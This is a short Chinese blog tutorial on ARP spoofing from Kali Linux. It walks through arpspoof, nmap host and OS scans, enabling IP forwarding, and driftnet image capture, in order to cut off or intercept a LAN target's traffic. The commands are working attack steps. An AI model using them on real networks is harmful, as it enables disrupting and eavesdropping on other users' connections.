您的位置:首页 > 运维架构 > Linux

kail linux arp 欺骗 断网 流量转发

2018-01-21 10:39 627 查看
arp攻击
工具:arpspoof
查看使用办法 arpspoof -h
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
对应: arpspoof -i 网卡 -t 目标Ip  网关

这个命令的用法是 让 目标ip的流量发到 当前机器的网卡,如果设置了ip_forward就会转发到网关,没有 就会断网。

注意这里我使用了 -c own参数,(不设置就没法)。

nmap -sP 192.168.3.0/24

这个命令是扫描当前局域网内所有IP,后面的24是子网掩码 255.255.255.0决定的。
nmap -O 目标IP探测目标IP的操作系统信息
echo 1 >> /proc/sys/net/ipv4/ip_forward开启内核的IP包转发功能。
如果流量来了,可以自己抓包获取。

也可以使用

driftnet -i 网卡来获取 目标机器上的图片。(比如 HTTP请求的图片)





我用的系统是kail mate。

本文原创,请勿转载。只做技术研究,请勿用于非法用途。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: